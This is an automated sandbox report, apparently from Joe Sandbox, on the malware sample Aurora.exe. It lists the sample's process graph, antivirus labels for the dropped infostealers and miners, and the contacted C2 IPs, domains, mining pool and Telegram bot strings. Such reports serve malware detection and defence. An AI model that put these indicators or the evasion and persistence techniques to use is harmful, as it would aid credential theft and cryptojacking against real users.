                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                      Services File Permissions Weakness
                      KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483204 Sample: Aurora.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 97 xmr-us-east1.nanopool.org 2->97 99 thesirenmika.com 2->99 101 auroraforge.art 2->101 115 Found malware configuration 2->115 117 Malicious sample detected (through community Yara rule) 2->117 119 Antivirus detection for dropped file 2->119 123 25 other signatures 2->123 11 Aurora.exe 11 2->11         started        15 OneDrive Updater.exe 2->15         started        17 OneDrive Updater.exe 2->17         started        19 9 other processes 2->19 signatures3 121 DNS related to crypt mining pools 97->121 process4 file5 87 \Device87ull, PE32+ 11->87 dropped 89 C:\Users\user\AppData\Roaming\...\vlc.exe, PE32+ 11->89 dropped 91 C:\Users\user\AppData\...\OneDrive.exe, PE32 11->91 dropped 93 2 other malicious files 11->93 dropped 165 Detected unpacking (changes PE section rights) 11->165 167 Query firmware table information (likely to detect VMs) 11->167 169 Tries to detect sandboxes and other dynamic analysis tools (window names) 11->169 181 3 other signatures 11->181 21 OneDrive.exe 5 11->21         started        25 AdobeUpdate.exe 1 11->25         started        27 vlc.exe 11->27         started        37 2 other processes 11->37 171 Writes to foreign memory regions 15->171 173 Allocates memory in foreign processes 15->173 175 Injects a PE file into a foreign processes 15->175 29 RegAsm.exe 15->29         started        31 RegAsm.exe 17->31         started        177 Loading BitLocker PowerShell Module 19->177 179 Modifies power options to not sleep / hibernate 19->179 33 conhost.exe 19->33         started        35 conhost.exe 19->35         started        40 16 other processes 19->40 signatures6 process7 dnsIp8 83 C:\Users\user\...\OneDrive Updater.exe, PE32 21->83 dropped 131 Suspicious powershell command line found 21->131 133 Found many strings related to Crypto-Wallets (likely being stolen) 21->133 135 Writes to foreign memory regions 21->135 147 2 other signatures 21->147 42 cmd.exe 1 21->42         started        45 powershell.exe 1 23 21->45         started        47 RegAsm.exe 21->47         started        137 Antivirus detection for dropped file 25->137 139 Multi AV Scanner detection for dropped file 25->139 141 Found evasive API chain (may stop execution after checking mutex) 25->141 143 Creates multiple autostart registry keys 25->143 50 cmd.exe 1 25->50         started        85 C:\Users\user\AppData\Roaming\...\svchost.exe, PE32+ 27->85 dropped 145 Found direct / indirect Syscall (likely to bypass EDR) 27->145 105 154.81.220.233, 28105, 49730, 49737 MULTA-ASN1US Seychelles 37->105 52 conhost.exe 37->52         started        file9 signatures10 process11 dnsIp12 149 Uses schtasks.exe or at.exe to add and modify task schedules 42->149 54 conhost.exe 42->54         started        56 schtasks.exe 42->56         started        151 Creates multiple autostart registry keys 45->151 153 Loading BitLocker PowerShell Module 45->153 58 conhost.exe 45->58         started        107 auroraforge.art 192.64.119.108, 49732, 49753, 49764 NAMECHEAP-NETUS United States 47->107 109 thesirenmika.com 123.123.123.123, 49748, 49759, 55713 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN China 47->109 155 Hides that the sample has been downloaded from the Internet (zone.identifier) 47->155 157 Uses ping.exe to sleep 50->157 159 Uses powercfg.exe to modify the power settings 50->159 161 Uses ping.exe to check the status of other devices and networks 50->161 163 Modifies power options to not sleep / hibernate 50->163 60 cmd.exe 2 50->60         started        64 conhost.exe 50->64         started        signatures13 process14 file15 66 svchost.exe 54->66         started        70 conhost.exe 54->70         started        95 C:\Users\user\AppData\Local\Msedge.exe, PE32+ 60->95 dropped 183 Uses ping.exe to sleep 60->183 72 cmd.exe 1 60->72         started        74 conhost.exe 60->74         started        76 icacls.exe 1 60->76         started        78 2 other processes 60->78 signatures16 process17 dnsIp18 103 51.79.71.77, 14444, 49755 OVHFR Canada 66->103 125 Query firmware table information (likely to detect VMs) 66->125 127 Suspicious powershell command line found 70->127 80 Msedge.exe 72->80         started        signatures19 129 Detected Stratum mining protocol 103->129 process20 signatures21 111 Antivirus detection for dropped file 80->111 113 Multi AV Scanner detection for dropped file 80->113

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Aurora.exe100%AviraBDS/Bladabindi.udrny
                      Aurora.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Msedge.exe100%AviraHEUR/AGEN.1315687
                      C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe100%AviraHEUR/AGEN.1305500
                      C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe100%AviraHEUR/AGEN.1315687
                      C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe100%AviraTR/AD.Nekark.apwee
                      C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe100%AviraTR/AD.Nekark.apwee
                      C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Msedge.exe67%ReversingLabsWin64.Infostealer.ClipBanker
                      C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe67%ReversingLabsWin64.Infostealer.ClipBanker
                      C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe53%ReversingLabsWin64.Trojan.Molotov
                      C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe96%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                      C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe68%ReversingLabsByteCode-MSIL.Hacktool.ResInject
                      C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe68%ReversingLabsByteCode-MSIL.Hacktool.ResInject
                      C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe53%ReversingLabsWin64.Trojan.Molotov
                      \Device\Null0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://contoso.com/License0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      https://aka.ms/pscore6lB0%URL Reputationsafe
                      https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://api.ipify.org/0%URL Reputationsafe
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                      http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnectLR0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                      http://go.micros0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/EnvironmentSettingsLR0%Avira URL Cloudsafe
                      http://tempuri.org/Endpo$0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%Avira URL Cloudsafe
                      http://154.81.220.233:0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckCon0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                      http://tempuri.org/Endpo(0%Avira URL Cloudsafe
                      auroraforge.art0%Avira URL Cloudsafe
                      https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                      http://tempuri.org/Endpo40%Avira URL Cloudsafe
                      https://github.com/sapics/ip-location-db/raw/master/dbip-city/dbip-city-ipv4.csv.gzjson:0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/VerifyUpdateLR0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdatesLR0%Avira URL Cloudsafe
                      https://www.sysinternals.com00%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/0%Avira URL Cloudsafe
                      https://stackoverflow.com/q/2152978/23354sCannot0%Avira URL Cloudsafe
                      https://go.microsoft.coV0%Avira URL Cloudsafe
                      http://tempuri.org/00%Avira URL Cloudsafe
                      https://aka.ms/winsvr-2022-pshelp0%Avira URL Cloudsafe
                      https://t.me/aurora_botnet_support0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                      https://api.telegram.org/file/bot%s/%sindex0%Avira URL Cloudsafe
                      https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                      http://154.81.220.233:281050%Avira URL Cloudsafe
                      https://github.com/electron/electron/releases/download/v%s/electron-v%s-%s-%s.zipInvalid0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentLR0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                      http://154.81.220.233:28105t-0%Avira URL Cloudsafe
                      http://154.81.220.233:28105/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe
                      https://go.microsoft.coVpnClient.psd1mpatib0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                      http://127.0.0.1/dashboardid0%Avira URL Cloudsafe
                      http://tempuri.org/Endpo0%Avira URL Cloudsafe
                      https://t.me/cheshire_aurora0%Avira URL Cloudsafe
                      https://ipwho.is/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      thesirenmika.com
                      123.123.123.123
                      truetrue
                        unknown
                        auroraforge.art
                        192.64.119.108
                        truetrue
                          unknown
                          xmr-us-east1.nanopool.org
                          51.222.106.253
                          truetrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            auroraforge.arttrue
                            • Avira URL Cloud: safe
                            unknown
                            http://154.81.220.233:28105/true
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://tempuri.org/Endpoint/CheckConnectLRbuild.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXbuild.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/EnvironmentSettingsbuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/soap/envelope/build.exe, 00000004.00000002.2937734948.0000000002926000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://tempuri.org/build.exe, 00000004.00000002.2937734948.0000000002926000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://tempuri.org/Endpoint/EnvironmentSettingsLRbuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpo$build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/VerifyUpdateResponsebuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://go.microspowershell.exe, 0000000D.00000002.1764000122.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/SetEnvironmentbuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/SetEnvironmentResponsebuild.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://154.81.220.233:build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/CheckConbuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/GetUpdatesbuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/sapics/ip-location-db/raw/master/dbip-city/dbip-city-ipv4.csv.gzjson:Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpo(build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.ipify.orgcookies//settinString.Removegbuild.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/GetUpdatesLRbuild.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.1764000122.0000000004881000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://tempuri.org/Endpo4build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/VerifyUpdateLRbuild.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://stackoverflow.com/q/11564914/23354;OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.sysinternals.com0vlc.exe, 00000013.00000002.1999343349.0000014C54370000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/powershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.1782478788.00000000058EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1934227592.0000028FBF695000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://tempuri.org/Endpoint/build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/VerifyUpdatebuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/0build.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://stackoverflow.com/q/2152978/23354sCannotOneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebuild.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1727999189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1764000122.0000000004881000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2933944946.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1775465681.0000028FAF621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2050954318.000002942EC91000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://go.microsoft.coVpowershell.exe, 0000000D.00000002.1790765252.00000000071D0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.ipify.org/OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://ipinfo.io/ip%appdata%build.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://t.me/aurora_botnet_supportAurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.1782478788.00000000058EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1934227592.0000028FBF695000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.telegram.org/file/bot%s/%sindexAurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://stackoverflow.com/q/14436606/23354OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2933944946.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2933944946.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000D.00000002.1764000122.00000000049D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousbuild.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://tempuri.org/Endpoint/CheckConnectResponsebuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.ip.sb/geoip%USERPEnvironmentROFILE%build.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://154.81.220.233:28105build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://tempuri.org/Endpoint/CheckConnectbuild.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/electron/electron/releases/download/v%s/electron-v%s-%s-%s.zipInvalidAurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://154.81.220.233:28105t-build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/SetEnvironmentLRbuild.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://go.microsoft.coVpnClient.psd1mpatibpowershell.exe, 0000000D.00000002.1790765252.00000000071D0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressingbuild.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crl.micropowershell.exe, 0000000D.00000002.1759509854.0000000002D78000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://tempuri.org/Endpoint/GetUpdatesResponsebuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000D.00000002.1764000122.00000000049D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
